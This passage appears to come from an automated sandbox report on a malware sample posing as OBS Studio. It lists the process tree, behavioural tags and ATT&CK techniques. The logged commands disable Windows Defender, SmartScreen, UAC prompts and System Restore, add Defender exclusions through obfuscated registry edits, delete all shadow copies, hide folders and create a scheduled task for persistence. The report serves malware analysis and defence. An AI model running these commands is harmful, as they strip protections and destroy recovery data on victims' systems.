    [3] C:\Windows\system32\reg.exe
        cmd: reg add "hklm\software\policies\microsoft\windows defender security center\app and browser protection" /v uilockdown /t reg_dword /d 1 /f
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "hklm\software\policies\microsoft\windows defender security center\virus and threat protection" /v uilockdown /t reg_dword /d 1 /f
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "hklm\software\policies\microsoft\windows nt\systemrestore" /v "disableconfig" /t reg_dword /d "1" /f
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "hklm\software\policies\microsoft\windows nt\systemrestore" /v "disablesr" /t reg_dword /d "1" /f
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "hkcu\software\microsoft\windows\currentversion\policies\attachments" /v "savezoneinformation" /t reg_dword /d "1" /f
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "hklm\software\microsoft\windows\currentversion\policies\attachments" /v "savezoneinformation" /t reg_dword /d "1" /f
    [3] C:\Windows\system32\reg.exe
        cmd: reg add "hklm\software\microsoft\windows\currentversion\policies\attachments" /v "scanwithantivirus" /t reg_dword /d "1" /f
    [3] C:\Windows\system32\icacls.exe
        cmd: icacls "C:\Users\Admin\AppData\Roaming\microsoft\windows\start menu\programs\startup" /remove:d "everyone" /t /c
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\icacls.exe
        cmd: icacls "C:\Users\Admin\AppData\Roaming\microsoft\windows\start menu\programs\startup" /deny "everyone":(de,dc) /t /c
        - Possible privilege escalation attempt
        - Modifies file permissions
    [3] C:\Windows\system32\schtasks.exe
        cmd: schtasks /create /xml "C:\Users\Admin\AppData\Roaming\obs-studio\bin\64bit\ar.xml" /tn ar /f
        - Creates scheduled task(s)
    [3] C:\Windows\system32\attrib.exe
        cmd: attrib +s +h C:\Users\Admin\AppData\Roaming\obs-studio
        - Sets file to hidden
        - Views/modifies file attributes
    [3] C:\Windows\system32\attrib.exe
        cmd: attrib +s +h C:\tmp
        - Sets file to hidden
        - Views/modifies file attributes
    [3] C:\Windows\system32\vssadmin.exe
        cmd: vssadmin delete shadows /all /quiet
        - Interacts with shadow copies
C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exer.exe /Sw:0 reg.eXe Add "hKlM\sOftWare\miCroSoFt\WINdOWs defeNder\exCLUSIOns\extensions" /V dLl /t reG_dWOrd /d 0 /f1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe" /Sw:0 reg.eXe Add "hKlM\sOftWare\miCroSoFt\WINdOWs defeNder\exCLUSIOns\extensions" /V dLl /t reG_dWOrd /d 0 /f2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe"C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe" /TI/ /Sw:0 reg.eXe Add "hKlM\sOftWare\miCroSoFt\WINdOWs defeNder\exCLUSIOns\extensions" /V dLl /t reG_dWOrd /d 0 /f3⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reg.eXe (depth 4)
"C:\Windows\system32\reg.eXe" Add "hKlM\sOftWare\miCroSoFt\WINdOWs defeNder\exCLUSIOns\extensions" /V dLl /t reG_dWOrd /d 0 /f
- Windows security bypass
-
C:\Windows\system32\reg.exe (depth 1)
reg add "hklm\software\microsoft\windows\currentversion\policies\system" /v "consentpromptbehavioradmin" /t reg_dword /d "0" /f
- UAC bypass
-
C:\Windows\system32\reg.exe (depth 1)
reg add "hklm\software\microsoft\windows\currentversion\policies\system" /v "consentpromptbehavioruser" /t reg_dword /d "0" /f
- UAC bypass
-
C:\Windows\system32\reg.exe (depth 1)
reg add "hklm\software\microsoft\windows\currentversion\policies\system" /v "promptonsecuredesktop" /t reg_dword /d "0" /f
- UAC bypass
-
C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exe (depth 1)
taskkill /im smartscreen.exe /f
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exe (depth 1)
icacls "C:\Windows\system32\smartscreen.exe" /reset
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\icacls.exe (depth 1)
icacls "C:\Windows\system32\smartscreen.exe" /inheritance:r /remove *s-1-5-32-544 *S-1-5-11 *s-1-5-32-545 *s-1-5-18
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\takeown.exe (depth 1)
takeown /f "C:\Windows\system32\smartscreen.exe" /a
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe (depth 1)
r.eXe /sW:0 reG.exe Add "hKlm\sOfTwAre\miCrOSoft\WiNdOwS defender\eXCLUSIONS\eXtensiOns" /V sCr /T reg_dWOrd /d 0 /f
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe (depth 2)
"C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe" /sW:0 reG.exe Add "hKlm\sOfTwAre\miCrOSoft\WiNdOwS defender\eXCLUSIONS\eXtensiOns" /V sCr /T reg_dWOrd /d 0 /f
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe (depth 3)
"C:\Users\Admin\AppData\Local\Temp\is-OO29T.tmp\temp\r.exe" /TI/ /sW:0 reG.exe Add "hKlm\sOfTwAre\miCrOSoft\WiNdOwS defender\eXCLUSIONS\eXtensiOns" /V sCr /T reg_dWOrd /d 0 /f
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\system32\reG.exe (depth 4)
"C:\Windows\system32\reG.exe" Add "hKlm\sOfTwAre\miCrOSoft\WiNdOwS defender\eXCLUSIONS\eXtensiOns" /V sCr /T reg_dWOrd /d 0 /f
- Windows security bypass
-
C:\Windows\system32\reg.exe (depth 1)
reg add "hklm\software\policies\microsoft\windows defender\mpengine" /v "mpenablepus" /t reg_dword /d "0" /f
-
C:\Windows\system32\reg.exe (depth 1)
reg add "hklm\system\currentcontrolset\control\deviceguard\scenarios\hypervisorenforcedcodeintegrity" /v "enabled" /t reg_dword /d "1" /f
-
C:\Windows\system32\reg.exe (depth 1)
reg add "hklm\software\policies\microsoft\windows defender" /v "puaprotection" /t reg_dword /d "0" /f
-
C:\Windows\system32\reg.exe (depth 1)
reg add "hklm\software\policies\microsoft\windows defender\spynet" /v "spynetreporting" /t reg_dword /d "0" /f
-
C:\Windows\system32\reg.exe (depth 1)
reg add "hklm\software\policies\microsoft\windows\system" /v "enablesmartscreen" /t reg_dword /d "0" /f
-
C:\Windows\system32\reg.exe (depth 1)
reg add "hklm\software\policies\microsoft\windows defender\spynet" /v "submitsamplesconsent" /t reg_dword /d "2" /f
-
C:\Windows\system32\reg.exe (depth 1)
reg add "hklm\software\microsoft\windows\currentversion\explorer" /v "smartscreenenabled" /t reg_sz /d "off" /f
-
C:\Windows\SysWOW64\curl.exe (depth 1)
cUrL -s ipINFO.io/Ip
-
C:\Windows\system32\vssvc.exe (depth 1)
C:\Windows\system32\vssvc.exe
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\taskkill.exe (depth 1)
taskkill /f /im obs64.scr
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Persistence
Modify Existing Service (1)
Hidden Files and Directories (2)
Scheduled Task (1)
Downloads